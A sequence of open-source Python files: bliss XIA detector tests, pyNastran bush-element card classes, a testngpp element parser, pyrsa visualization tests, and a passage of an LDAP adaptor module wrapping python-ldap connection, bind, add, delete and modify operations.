with pytest.raises(TypeError):
xia.set_preset_mode(PresetMode.NONE, 1)
with pytest.raises(TypeError):
xia.set_preset_mode(PresetMode.REALTIME, None)
def test_xia_trigger_mode(xia):
client = xia._proxy
# XMAP specific tests
xmap = isinstance(xia, XMAP)
if xmap:
client.get_trigger_channels.return_value = [0]
xmap_prefix = [(('gate_master', True, 0),)]
else:
xmap_prefix = []
# First test
xia.set_trigger_mode(None)
assert client.set_acquisition_value.call_args_list == [
(('gate_ignore', 1),),
(('mapping_mode', 0),)]
client.apply_acquisition_values.assert_called_once_with()
# Second test
client.set_acquisition_value.reset_mock()
client.apply_acquisition_values.reset_mock()
xia.set_trigger_mode(TriggerMode.GATE)
assert client.set_acquisition_value.call_args_list == xmap_prefix + [
(('gate_ignore', 0),),
(('mapping_mode', 1),),
(('pixel_advance_mode', 1),)]
client.apply_acquisition_values.assert_called_once_with()
# Third test
client.set_acquisition_value.reset_mock()
client.apply_acquisition_values.reset_mock()
client.get_acquisition_value.return_value = 3 # Multiple
xia.set_trigger_mode(TriggerMode.SYNC)
assert client.set_acquisition_value.call_args_list == xmap_prefix + [
(('gate_ignore', 1),),
(('mapping_mode', 1),),
(('pixel_advance_mode', 1),)]
client.apply_acquisition_values.assert_called_once_with()
# Error tests
with pytest.raises(ValueError):
xia.set_trigger_mode(13)
# XMAP specific
if xmap:
client.get_trigger_channels.return_value = []
with pytest.raises(ValueError):
xia.set_trigger_mode(TriggerMode.GATE)
# XMAP specific
if xmap:
client.get_trigger_channels.return_value = [0]
with pytest.raises(ValueError):
xia.set_trigger_mode(TriggerMode.GATE, channel=1)
def test_xia_hardware_points(xia):
client = xia._proxy
# Test single setter
client.get_acquisition_value.return_value = 1.
xia.set_hardware_points(3)
client.set_acquisition_value.assert_called_once_with('num_map_pixels', 3)
client.apply_acquisition_values.assert_called_once_with()
# Test single getter
values = [1., 3.]
client.get_acquisition_value.reset_mock()
client.get_acquisition_value.side_effect = lambda *args: values.pop(0)
assert xia.hardware_points == 3
assert client.get_acquisition_value.call_args_list == [
(('mapping_mode',),),
(('num_map_pixels',),)]
# Error tests
with pytest.raises(ValueError):
xia.set_hardware_points(0)
def test_xia_block_size(xia):
client = xia._proxy
# Test simple setter
assert xia.set_block_size(3) is None
client.set_acquisition_value.assert_called_once_with(
'num_map_pixels_per_buffer', 3)
client.apply_acquisition_values.assert_called_once_with()
# Test simple getter
client.get_acquisition_value.reset_mock()
client.get_acquisition_value.return_value = 3
assert xia.block_size == 3
assert client.get_acquisition_value.call_args_list == [
(('mapping_mode',),),
(('num_map_pixels_per_buffer',),)]
# Test default setter
client.apply_acquisition_values.reset_mock()
assert xia.set_block_size() is None
client.set_maximum_pixels_per_buffer.assert_called_once_with()
client.apply_acquisition_values.assert_called_once_with()
def test_xia_software_acquisition(xia, mocker):
client = xia._proxy
sleep = mocker.patch('gevent.sleep')
sleep.side_effect = lambda x: client.mock_not_running()
client.get_spectrums.return_value = {0: [3, 2, 1]}
client.get_statistics.return_value = {0: range(7)}
stats = Stats(*range(7))
assert xia.run_software_acquisition(1, 3.) == (
[{0: [3, 2, 1]}],
[{0: stats}])
def test_xia_multiple_acquisition(xia, mocker):
client = xia._proxy
client.get_spectrums.return_value = {0: [3, 2, 1]}
client.get_statistics.return_value = {0: range(9)}
client.synchronized_poll_data.side_effect = lambda: data.pop(0)
data = [(1, {0: {0: 'discarded'}}, {0: {0: [0]*7}}),
(2, {1: {0: 'spectrum0'}}, {1: {0: range(7)}}),
(3, {2: {0: 'spectrum1'}}, {2: {0: range(10, 17)}})]
stats0, stats1 = Stats(*range(7)), Stats(*range(10, 17))
data, stats = xia.run_synchronized_acquisition(2)
assert data == [{0: 'spectrum0'}, {0: 'spectrum1'}]
assert stats == [{0: stats0}, {0: stats1}]
def test_xia_configuration_error(xia):
client = xia._proxy
client.init.side_effect = IOError('File not found!')
with pytest.raises(IOError):
xia.load_configuration('i-dont-exist')
assert not xia.configured
assert xia.current_configuration is None
assert xia.current_configuration_values is None
def test_xia_finalization(xia):
client = xia._proxy
xia.finalize()
client.close.assert_called_once_with()
@pytest.mark.parametrize(
'dtype',
['xia', 'mercury', 'xmap', 'falconx'])
def test_xia_from_wrong_beacon_config(dtype, beacon, mocker):
# ZeroRPC error
beacon.reload()
m = mocker.patch('zerorpc.Client')
m.side_effect = IOError('Cannot connect!')
with pytest.raises(IOError):
beacon.get(dtype + '1')
# Handel error
m = mocker.patch('zerorpc.Client')
client = m.return_value
client.init.side_effect = IOError('File not found!')
with pytest.raises(IOError):
beacon.get(dtype + '1')
|
tiagocoutinho/bliss
|
tests/mca/test_xia.py
|
Python
|
lgpl-3.0
| 8,209
|
# pylint: disable=C0103,R0902,R0904,R0914,C0111
"""
All bush elements are defined in this file. This includes:
* CBUSH
* CBUSH1D
* CBUSH2D
All bush elements are BushElement and Element objects.
"""
from __future__ import (nested_scopes, generators, division, absolute_import,
print_function, unicode_literals)
from pyNastran.utils import integer_types
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.cards.base_card import Element
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank, integer_double_or_blank, double_or_blank,
string_or_blank)
from pyNastran.bdf.field_writer_8 import print_card_8
class BushElement(Element):
def __init__(self):
self.cid = None
Element.__init__(self)
def Cid(self):
if self.cid is None:
return None
elif isinstance(self.cid, integer_types):
return self.cid
return self.cid_ref.cid
def Mass(self):
return 0.
def get_edge_ids(self):
"""
Return the edge IDs
"""
return [tuple(sorted(self.node_ids))]
class CBUSH(BushElement):
type = 'CBUSH'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 8:'cid', 9:'s', 10:'ocid'
}
def _update_field_helper(self, n, value):
if n == 11:
self.si[0] = value
elif n == 12:
self.si[1] = value
elif n == 13:
self.si[2] = value
else:
if self.g0 is not None:
if n == 5:
self.g0 = value
else:
raise KeyError('Field %r=%r is an invalid %s entry.' % (n, value, self.type))
else:
if n == 5:
self.x[0] = value
elif n == 6:
self.x[1] = value
elif n == 7:
self.x[2] = value
else:
raise KeyError('Field %r=%r is an invalid %s entry.' % (n, value, self.type))
def __init__(self, eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=''):
BushElement.__init__(self)
if comment:
self.comment = comment
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.x = x
self.g0 = g0
self.cid = cid
self.s = s
self.ocid = ocid
self.si = si
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid', eid)
ga = integer(card, 3, 'ga')
gb = integer_or_blank(card, 4, 'gb')
x1_g0 = integer_double_or_blank(card, 5, 'x1_g0')
if isinstance(x1_g0, integer_types):
g0 = x1_g0
x = None
elif isinstance(x1_g0, float):
g0 = None
x1 = x1_g0
x2 = double_or_blank(card, 6, 'x2', 0.0)
x3 = double_or_blank(card, 7, 'x3', 0.0)
x = [x1, x2, x3]
assert max(x) != min(x), 'x=%s' % x
else:
g0 = None
x = [None, None, None]
#: Element coordinate system identification. A 0 means the basic
#: coordinate system. If CID is blank, then the element coordinate
#: system is determined from GO or Xi.
#: (default=blank=element-based)
cid = integer_or_blank(card, 8, 'cid')
#: Location of spring damper (0 <= s <= 1.0)
s = double_or_blank(card, 9, 's', 0.5)
#: Coordinate system identification of spring-damper offset. See
#: Remark 9. (Integer > -1; Default = -1, which means the offset
#: point lies on the line between GA and GB
ocid = integer_or_blank(card, 10, 'ocid', -1)
#: Components of spring-damper offset in the OCID coordinate system
#: if OCID > 0.
si = [double_or_blank(card, 11, 's1'),
double_or_blank(card, 12, 's2'),
double_or_blank(card, 13, 's3')]
assert len(card) <= 14, 'len(CBUSH card) = %i\ncard=%s' % (len(card), card)
return CBUSH(eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=comment)
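# Illustrative cards (not from the original file) as add_card() parses them:
#     CBUSH, 100, 200, 1, 2, 5              -> orientation from grid G0=5
#     CBUSH, 100, 200, 1, 2, 1.0, 0.0, 0.0  -> orientation vector x=[1., 0., 0.]
#     CBUSH, 100, 200, 1, 2                 -> no orientation data (x=[None]*3)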
@classmethod
def add_op2_data(cls, data, f, comment=''):
((eid, pid, ga, gb, cid, s, ocid, si), x, g0) = data
return CBUSH(eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=comment)
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def nodes(self):
return [self.ga, self.gb]
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
ocid = self.OCid()
pid = self.Pid()
#si = self.si
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types) or gb is None, 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types) or cid is None, 'cid=%r' % cid
assert isinstance(ocid, integer_types), 'ocid=%r' % ocid
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types) or self.gb is None:
return self.gb
return self.gb_ref.nid
def OCid(self):
if self.ocid is None:
return None
elif isinstance(self.ocid, integer_types):
return self.ocid
return self.ocid_ref.cid
def Cid(self):
if self.cid is None:
return None
elif isinstance(self.cid, integer_types):
return self.cid
return self.cid_ref.cid
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
if self.gb is not None:
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
self.pid = model.Property(self.pid, msg=msg)
self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid, msg=msg)
self.cid_ref = self.cid
    def uncross_reference(self):
        self.ga = self.Ga()
        self.gb = self.Gb()
        self.pid = self.Pid()
        self.cid = self.Cid()
        # gb_ref/cid_ref are only created by cross_reference when gb/cid are set
        if self.gb is not None:
            del self.gb_ref
        if self.cid is not None:
            del self.cid_ref
        del self.ga_ref, self.pid_ref
def raw_fields(self):
if self.g0 is not None:
x = [self.g0, None, None]
else:
x = self.x
list_fields = (['CBUSH', self.eid, self.Pid(), self.Ga(), self.Gb()] + x +
[self.Cid(), self.s, self.ocid] + self.si)
return list_fields
def repr_fields(self):
if self.g0 is not None:
x = [self.g0, None, None]
else:
x = self.x
ocid = set_blank_if_default(self.OCid(), -1)
s = set_blank_if_default(self.s, 0.5)
list_fields = (['CBUSH', self.eid, self.Pid(), self.Ga(), self.Gb()] +
x + [self.Cid(), s, ocid] + self.si)
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
class CBUSH1D(BushElement):
type = 'CBUSH1D'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 5:'cid',
}
    def __init__(self, eid, pid, ga, gb, cid, comment=''):
        BushElement.__init__(self)
        if comment:
            self.comment = comment
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.cid = cid
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid', eid)
ga = integer(card, 3, 'ga')
gb = integer_or_blank(card, 4, 'gb')
cid = integer_or_blank(card, 5, 'cid')
assert len(card) <= 6, 'len(CBUSH1D card) = %i\ncard=%s' % (len(card), card)
return CBUSH1D(eid, pid, ga, gb, cid, comment=comment)
#@classmethod
#def add_op2_data(cls, data, comment=''):
#eid = data[0]
#pid = data[1]
#ga = data[2]
#gb = data[3]
#raise NotImplementedError(data)
#return CBUSH1D(eid, pid, ga, gb, cid, comment=comment)
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH1D eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
if self.gb:
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
self.pid = model.Property(self.pid, msg=msg)
self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid)
self.cid_ref = self.cid
    def uncross_reference(self):
        self.ga = self.Ga()
        self.gb = self.Gb()
        self.cid = self.Cid()
        self.pid = self.Pid()
        # gb_ref/cid_ref are only created by cross_reference when gb/cid are set
        if self.gb is not None:
            del self.gb_ref
        if self.cid is not None:
            del self.cid_ref
        del self.ga_ref, self.pid_ref
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
pid = self.Pid()
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types) or gb is None, 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types) or cid is None, 'cid=%r' % cid
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
#elif self.ga is None:
#return None
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types):
return self.gb
elif self.gb is None:
return None
return self.gb_ref.nid
@property
def nodes(self):
return [self.ga, self.gb]
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def raw_fields(self):
list_fields = ['CBUSH1D', self.eid, self.Pid(), self.Ga(), self.Gb(),
self.Cid()]
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
class CBUSH2D(BushElement):
"""
2-D Linear-Nonlinear Connection
Defines the connectivity of a two-dimensional Linear-Nonlinear element.
"""
type = 'CBUSH2D'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 5:'cid', 6:'plane', 7:'sptid',
}
def __init__(self, eid, pid, ga, gb, cid, plane, sptid, comment=''):
BushElement.__init__(self)
if comment:
self.comment = comment
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.cid = cid
self.plane = plane
self.sptid = sptid
if self.plane not in ['XY', 'YZ', 'ZX']:
msg = ("plane not in required list, plane=|%s|\n"
"expected planes = ['XY','YZ','ZX']" % self.plane)
raise RuntimeError(msg)
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid')
ga = integer(card, 3, 'ga')
gb = integer(card, 4, 'gb')
cid = integer_or_blank(card, 5, 'cid', 0)
plane = string_or_blank(card, 6, 'plane', 'XY')
sptid = integer_or_blank(card, 7, 'sptid')
assert len(card) <= 8, 'len(CBUSH2D card) = %i\ncard=%s' % (len(card), card)
return CBUSH2D(eid, pid, ga, gb, cid, plane, sptid, comment=comment)
#@classmethod
#def add_op2_data(cls, data, comment=''):
#eid = data[0]
#pid = data[1]
#ga = data[2]
#gb = data[3]
#raise NotImplementedError(data)
#return CBUSH2D(eid, pid, ga, gb, cid, plane, sptid, comment=comment)
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
pid = self.Pid()
plane = self.plane
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types), 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types), 'cid=%r' % cid
assert self.plane in ['XY', 'YZ', 'ZX'], 'plane=%r' % plane
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types):
return self.gb
return self.gb_ref.nid
@property
def nodes(self):
return [self.ga, self.gb]
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH2D eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
        self.pid = model.Property(self.pid, msg=msg)
self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid, msg=msg)
self.cid_ref = self.cid
if self.sptid is not None:
pass
def uncross_reference(self):
self.ga = self.Ga()
self.gb = self.Gb()
self.cid = self.Cid()
self.pid = self.Pid()
del self.ga_ref, self.gb_ref, self.cid_ref, self.pid_ref
def raw_fields(self):
list_fields = ['CBUSH2D', self.eid, self.Pid(), self.Ga(), self.Gb(),
self.Cid(), self.plane, self.sptid]
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
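# A minimal usage sketch (hypothetical IDs; assumes the usual pyNastran BDF
# workflow, which lives outside this module):
#   from pyNastran.bdf.bdf import BDF
#   model = BDF()
#   model.add_card(['CBUSH', 10, 100, 1, 2], 'CBUSH')
#   print(model.elements[10].write_card())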
|
saullocastro/pyNastran
|
pyNastran/bdf/cards/elements/bush.py
|
Python
|
lgpl-3.0
| 15,256
|
#!/usr/bin/python
from PreprocessScope import PreprocessScope
from PreprocessScopeParser import PreprocessScopeParser
from Useless import Useless
from Phase1Result import *
from Message import *
class ElemParser:
#######################################################
def __init__(self, file, parser, container):
self.file = file
self.parser = parser # for fixture
self.elem_parser = None
self.sub_scopes = []
self.done = None
self.last_line = None
self.container = container
#######################################################
def __handle_tag(self, line):
if isinstance(line, Tag):
self.parser.handle_tag(line)
return None
return True
#######################################################
def __handle_scope(self, line):
if isinstance(line, PreprocessScope):
if self.parser.verify_scope(line):
self.sub_scopes.append(line)
return None
return True
#######################################################
    def __handle_sub_elem(self, line):
        elem_parser = \
            self.parser.get_elem_parser( \
                self.container, \
                self.file, \
                line)
        if elem_parser is None:
            return True
        if not self.__handle_elem_result(elem_parser.is_done()):
            self.elem_parser = ElemParser(self.file, elem_parser, elem_parser.get_container())
        return None
#######################################################
def __parse_normal_line(self, line):
return self.parser.parse_line(line)
#######################################################
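    # Each handler returns True when it did not consume the line, so the
    # and-chain in __parse_by_myself falls through to the next handler;
    # returning None stops the chain for this line.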
def __parse_by_myself(self, line):
return self.__handle_tag(line) and \
self.__handle_scope(line) and \
self.__handle_sub_elem(line) and \
self.__parse_normal_line(line)
#######################################################
def __handle_elem_result(self, elem):
if elem:
if not isinstance(elem, Useless):
self.container.add_elem(elem)
self.elem_parser = None
return True
return None
#######################################################
def __parse_elem(self, line):
self.__handle_elem_result(self.elem_parser.parse_line(line))
return None
#######################################################
def __parse_scope(self, scope):
return PreprocessScopeParser(self.file, scope, self.parser, \
self.__class__, self.container.get_scope()).parse()
#######################################################
def __handle_sub_scopes(self):
for scope in self.sub_scopes:
self.container.add_sub_scope(self.__parse_scope(scope))
self.sub_scopes = []
#######################################################
def parse_line(self, line):
if self.done:
fatal(self.file, line, "testngpp generator internal error, please report bug to arthur.ii.yuan@gmail.com")
self.last_line = line
if self.elem_parser:
return self.__parse_elem(line)
self.done = self.__parse_by_myself(line)
if self.done and self.parser.should_parse_sub_scopes():
self.__handle_sub_scopes()
return self.done
#######################################################
    def incompleted_elem_def(self):
        return self.elem_parser is not None
#######################################################
def get_unhandled_sub_scopes(self):
return self.sub_scopes
##########################################################
|
aprovy/test-ng-pp
|
scripts/testngppgen/ElemParser.py
|
Python
|
lgpl-3.0
| 3,611
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
test_vis
Tests for the visualization module
@author: baihan
"""
import unittest
import numpy as np
import pyrsa.vis as rsv
import pyrsa.rdm as rsr
from scipy.spatial.distance import pdist
class TestVIS(unittest.TestCase):
def test_vis_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms)
self.assertEqual(mds_emb.shape, (8, 5, 2))
def test_vis_3d_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3)
self.assertEqual(mds_emb.shape, (8, 5, 3))
def test_vis_weighted_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
wes = np.random.random((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, weight=wes)
self.assertEqual(mds_emb.shape, (8, 5, 2))
def test_vis_3d_weighted_mds_output_shape_corresponds_to_inputs(self):
dis = np.random.rand(8, 10)
wes = np.random.random((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3, weight=wes)
self.assertEqual(mds_emb.shape[0], 8)
self.assertEqual(mds_emb.shape[1], 5)
self.assertEqual(mds_emb.shape[2], 3)
def test_vis_weighted_mds_output_behaves_like_mds(self):
dis = np.random.rand(8, 10)
wes = np.ones((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms)
wmds_emb = rsv.mds(rdms, weight=wes)
np.testing.assert_allclose(pdist(mds_emb[0]), pdist(wmds_emb[0]),
atol=3e-1)
def test_vis_3d_weighted_mds_output_behaves_like_mds(self):
dis = np.random.rand(8, 10)
wes = np.ones((8, 10))
mes = "Euclidean"
des = {'session': 0, 'subj': 0}
rdms = rsr.RDMs(dissimilarities=dis,
dissimilarity_measure=mes,
descriptors=des)
mds_emb = rsv.mds(rdms, dim=3)
wmds_emb = rsv.mds(rdms, dim=3, weight=wes)
np.testing.assert_allclose(pdist(mds_emb[0]), pdist(wmds_emb[0]),
atol=3e-1)
class Test_Icon(unittest.TestCase):
def test_Icon_no_error(self):
import PIL
from pyrsa.vis import Icon
import matplotlib.pyplot as plt
test_im = PIL.Image.fromarray(255 * np.random.rand(50, 100))
ic5 = Icon(image=test_im, col='red', border_width=5,
make_square=True, resolution=20)
ic5.plot(0.8, 0.8)
ic = Icon(image=255 * np.random.rand(50, 100), cmap='Blues')
ax = plt.axes(label='test')
ic.plot(0.5, 0.5, ax=ax)
ic2 = Icon(image=test_im, col='black', border_width=15,
string='test')
ic2.plot(0.8, 0.2, ax=ax, size=0.4)
ic2.x_tick_label(0.5, 0.15, offset=7)
ic2.y_tick_label(0.5, 0.25, offset=7)
ic3 = Icon(image=test_im, col='red', border_width=5,
make_square=True)
ic3.plot(0.2, 0.2, size=0.4)
ic4 = Icon(string='test')
ic4.plot(0.2, 0.8, size=0.4)
ic4.x_tick_label(0.75, 0.15, offset=7)
ic4.y_tick_label(0.75, 0.25, offset=17)
self.assertEqual(ic2.image, test_im)
if __name__ == '__main__':
unittest.main()
|
ilogue/pyrsa
|
tests/test_vis.py
|
Python
|
lgpl-3.0
| 4,262
|
""" the ldapadaptor module handles low-level LDAP operations """
from functools import wraps
import operator
import re
import logging
LOG = logging.getLogger(__name__)
import ldap
import ldap.filter
import ldap.dn
from ldap.controls import SimplePagedResultsControl as PagedCtrl
from plow.errors import LdapAdaptorError
try:
ldap.CONTROL_PAGEDRESULTS
make_page_control = PagedCtrl
get_page_control = operator.attrgetter("size", "cookie")
except AttributeError:
# seems like we are in < 2.4 version
def PCtrlAdapter(criticality, size, cookie):
return PagedCtrl(PagedCtrl.controlType, criticality, (size, cookie))
make_page_control = PCtrlAdapter
get_page_control = operator.attrgetter("controlValue")
RANGED_ATTR = re.compile(r"(?P<name>.*);range=(?P<start>\d+)-(?P<end>\*|\d+)$")
def get_new_ranges(attrs):
""" Returns a list of attributes that need to be fetched to complete
the attribute dict `attrs`. Those are all the attributes in the form
attrname;range=start-end
where end isn't *.
The new list will be the following ranges in the format
attrname;range=newstart-*
"""
extra = [
m.groupdict()
for m in
(RANGED_ATTR.match(attrname) for attrname in attrs)
if m is not None
]
return [
"{name};range={start}-*".format(
name = d["name"],
start = int(d["end"]) + 1,
)
for d in extra
if d["end"] != "*"
]
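# Example (illustrative): for attrs = {"member;range=0-1499": [...]} the next
# fetch list is ["member;range=1500-*"]; attributes without a ";range=" suffix,
# or whose range already ends in "*", contribute nothing.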
def check_connected(f):
""" Utility decorator to retry connection on ldap.SERVER_DOWN """
@wraps(f)
def _newcall_(self, *args, **kwargs):
if not self.is_connected:
LOG.debug("check_connected -> not connected")
self.initialize(self._server_url)
self.bind(self._binduser, self._bindpw)
try:
return f(self, *args, **kwargs)
except ldap.SERVER_DOWN, down:
LOG.debug("check_connected -> server down")
#Make a reconnect attempt
self.is_connected = False
self.initialize(self._server_url)
self.bind(self._binduser, self._bindpw)
return f(self, *args, **kwargs)
return _newcall_
class LdapAdaptor(object):
def __init__ (self,
server_uri,
base_dn,
bind_user=None,
bind_password=None,
certificate_validation=False,
referrals=None,
case_insensitive_dn=False,
dry_run=False,
require_delold=False,
):
"""
Creates the instance, initializing a connection and binding to the LDAP
server.
"""
self._connected = False
self._bound = False
self._ldap = None
self._server_url = server_uri
self._binduser, self._bindpw = bind_user, bind_password
self._base_dn = base_dn
self._cert_validation = certificate_validation
self._case_insensitive_dn = case_insensitive_dn
self._referrals = referrals
self.require_delold = require_delold
# FIXME : Defer initialization until connection is needed
self.initialize (self._server_url)
self.bind(self._binduser, self._bindpw)
self._dry_run = dry_run
def is_dry_run(self):
if hasattr(self._dry_run, "__call__"):
return self._dry_run()
else:
return self._dry_run
def _dry_run_msg(self):
if self.is_dry_run():
return "DRY-RUN "
else:
return ""
def __del__(self):
if self._ldap:
self._ldap.unbind()
def __str__(self):
return "<LdapAdaptor: {0}>".format(self._server_url)
def __repr__(self):
return str(self)
def initialize (self, server, p_version=ldap.VERSION3):
"""
Initializes the LDAP system and returns an LDAPObject.
Uses the initialize() function, which takes a simple LDAP URL (in the
format protocol://host:port) as a parameter. A safe connection can be
done using an ldaps:// protocol instead of ldap://. Standard
ldap.VERSION is 3, but can be changed passing the desired version
as a parameter.
"""
LOG.info("Initializing connection with server %s ..." % server)
try:
            # only disable certificate checking when validation is not requested
            if not self._cert_validation:
                ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
            if self._referrals is None:
                # 0 disables referral chasing (ldap.DEREF_NEVER is the alias
                # dereferencing constant; it merely happens to equal 0)
                ldap.set_option(ldap.OPT_REFERRALS, 0)
else:
ldap.set_option(ldap.OPT_REFERRALS, self._referrals)
#ldap.initialize will only raise an exception with a bad formed URL
self._ldap = ldap.initialize (server)
self.is_connected = True
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
self._ldap.protocol_version = p_version
    # FIXME: the client of the interface should not have to care about bind and
    # unbind: these should be managed internally. If the client code calls
    # client.add() without a prior client.bind(), it will fail, which is bad.
def bind (self, user_dn, user_passwd):
"""
Binds to the LDAP directory.
Once we have an LDAPObject instance, we need to bind to the LDAP server. The
python-ldap API supports both simple and SASL binding methods.
"""
LOG.info("Binding to the server with user %s ..." % user_dn)
if not self.is_connected:
self.initialize(self._server_url)
try:
self._ldap.simple_bind_s (user_dn, user_passwd)
except ldap.LDAPError, e:
self.is_connected = False
LOG.error("Caught ldap error: %s", str(e))
raise
def unbind (self):
"""
Unbinds and closes the connection to the LDAP server.
"""
LOG.info("Unbinding from the server")
if not self.is_connected:
LOG.debug("Not Connected")
return
try:
self._ldap.unbind()
self._ldap = None
except ldap.SERVER_DOWN, e:
LOG.warn("Caught SERVER_DOWN, ignoring")
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
finally:
# we can't rely on this being connected after an error
# or a successful unbind
self.is_connected = False
@check_connected
def add (self, dn, add_record):
"""
Perform an add operation.
add_record must be a list of tuples, where the first element of the tuple
must be an attribute and the second element of the tuple must be the value
of the attribute, which can be a list or a string.
        Hint: you may use ldap.modlist's addModlist() function to convert a
        dictionary into the format used here by add_record.
"""
LOG.debug("%(dry_run_msg)sAdding %(dn)s: %(data)s..." %
{"dry_run_msg": self._dry_run_msg(),
"dn": dn, "data": repr(add_record)})
if self.is_dry_run():
return
try:
result_type, result_data = self._ldap.add_s(dn, add_record)
if result_type != ldap.RES_ADD:
raise LdapAdaptorError(
"add: unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.ALREADY_EXISTS, e:
LOG.error("Record already exists")
raise
@check_connected
def delete (self, dn):
"""
Delete an ldap entry.
"""
LOG.debug("{dryrunmsg}Deleting {dn}..."
.format(dryrunmsg = self._dry_run_msg(), dn = dn))
if self.is_dry_run():
return
try:
res = self._ldap.delete_s (dn)
result_type, result_data = res[0], res[1]
if result_type != ldap.RES_DELETE:
raise LdapAdaptorError(
"delete : unexpected result %(type)s : %(result)s" %
{"type": str(result_type), "result": result_data})
except ldap.LDAPError, e:
LOG.error("Caught ldap error: %s", str(e))
raise
@check_connected
def modify (self, dn, mod_attrs):
""" Modify ldap attributes
mod_attrs is a list of modification three-tuples
(modification type, attribute name, value)
The modification type can be one of the followings:
- ldap.MOD_ADD : add the value to an attribute, if the schema allows
- ldap.MOD_DELETE : remove the value from the attribute, if it exists
- ldap.MOD_REPLACE : the value replaces old values of the attribute
- ldap.MOD_INCREMENT (code 3).
Hint: ldap.modlist's modifyModList() can be used to convert a data
strucutre in the format of a dictionnary in the format used here by
mod_attrs.
"""
LOG.debug("%(dry_run_msg)sModifying %(dn)s: %(attrs)s" %
